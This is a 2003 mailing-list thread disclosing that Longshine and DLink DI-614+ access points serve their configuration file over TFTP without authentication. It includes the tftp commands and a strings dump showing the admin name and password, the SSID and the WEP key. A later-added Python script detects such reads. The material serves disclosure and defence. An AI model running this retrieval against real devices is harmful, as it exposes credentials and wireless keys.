This vulnerability is also an issue on the popular DLink DI-614+ (which I think is based upon the Longshine product). I was able to grab config.img and also extract the "admin" password from it. This was confirmed with firmware version 2.03 dated 9/10/2002. On the DLink product, you can only perform this from the "LAN-side" of the device in the default configuration. DLink has version 2.10 available, dated 11/25/2002, but I have not tried it yet.

-Jeff

On Mon, 6 Jan 2003, Lukas Grunwald wrote:

> Hardware: Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps
>
> Software: ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc.
>
> Description: Get Superuser Privileges and view the device's password and password and other passwords
>
> Versions affected: tested with 03.01.0b and 03.01.0h
>
> Vendor contacted: e-mailed Longshine at Sun Dec 29
>
> Details: You are able to connect via tftp to the access-point and you can download the configuration
> without authentication the WEP Secret for the encryption and the password from your radius server is also readable.
> In this configuration is the Username of the Superuser and the corresponding password stored.
> The WEP Secret for the encryption and the password from your radius server is also readable.
> This "attack" works via WLAN (!!!) and Ethernet.
>
> tftp
> tftp> connect 192.168.108.48
> tftp> get config.img
> Received 780 bytes in 1.0 seconds
> tftp> quit
>
> [~]/-\>strings config.img
> DNXLABAP01 <- name of the AP
> root <- name of the superuser
> XXXXXX123 <- password from superuser
> DNXLABLAN <- ssid
> secu9 <- secret for WEP
> 7890abcdef <-
>
> You are also able to get the following files:
>
> config.img
> wbtune.dat
> mac.dat
> rom.img
> normal.img
>
>
> Solution: after contact with the vendor he claims that a new firmware-upgrade
> fixes this problem, but the latest available firmware on his web-page
> doesn't fix it anyway.
>
> Vendor-Contact:
>
> LONGSHINE Technologie (Europe) GmbH
>
> An der Strusbek 9
> D-22926 Ahrensburg
>
> Tel: ++ 49 ( 0 ) 4102 / 4922- 0
> Fax: ++ 49 ( 0 ) 4102 / 40109
>
> support@longshine.de
>
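
A detection-side sketch for the unauthenticated TFTP reads described in this thread, added here as an example and not part of either message: it parses TFTP read requests (RFC 1350) out of UDP payloads and flags requests for the files the advisory lists. It assumes the caller has already selected traffic to UDP port 69; the function names and the sample packets are constructed for illustration.

```python
import struct

# Files the advisory lists as retrievable from the access point over TFTP.
SENSITIVE_FILES = {"config.img", "wbtune.dat", "mac.dat", "rom.img", "normal.img"}
OP_RRQ = 1  # RFC 1350 opcode for a read request


def parse_rrq(payload: bytes):
    """Return (filename, mode) for a well-formed TFTP RRQ, otherwise None."""
    if len(payload) < 4:
        return None
    (opcode,) = struct.unpack("!H", payload[:2])
    if opcode != OP_RRQ:
        return None
    # Layout: filename NUL mode NUL [options...]; the split leaves a trailing
    # empty field after the final NUL, so a complete request has >= 3 fields.
    fields = payload[2:].split(b"\x00")
    if len(fields) < 3 or not fields[0] or not fields[1]:
        return None
    try:
        return fields[0].decode("ascii"), fields[1].decode("ascii").lower()
    except UnicodeDecodeError:
        return None


def flag_sensitive_reads(packets):
    """packets: iterable of (src_ip, dst_ip, udp_payload). Returns alert dicts."""
    alerts = []
    for src, dst, payload in packets:
        parsed = parse_rrq(payload)
        if parsed is None:
            continue
        filename, mode = parsed
        # Compare the base name case-insensitively so path prefixes and
        # upper-case variants of the same file are still matched.
        base = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
        if base in SENSITIVE_FILES:
            alerts.append({"src": src, "dst": dst, "file": filename, "mode": mode})
    return alerts


# Constructed sample payloads (not captured traffic); the source IPs are made up.
SAMPLE = [
    ("192.168.108.20", "192.168.108.48", b"\x00\x01config.img\x00octet\x00"),
    ("192.168.108.21", "192.168.108.48", b"\x00\x01readme.txt\x00netascii\x00"),
    ("192.168.108.22", "192.168.108.48", b"\x00\x02config.img\x00octet\x00"),  # WRQ
    ("192.168.108.23", "192.168.108.48", b"\x00\x01ROM.IMG\x00OCTET\x00"),
    ("192.168.108.24", "192.168.108.48", b"\x00\x01config.img"),  # truncated
]

if __name__ == "__main__":
    for alert in flag_sensitive_reads(SAMPLE):
        print(alert)
```

Since the thread reports the read works from both WLAN and Ethernet on the Longshine unit and from the LAN side on the DI-614+, the check is only useful on a capture point that sees those segments.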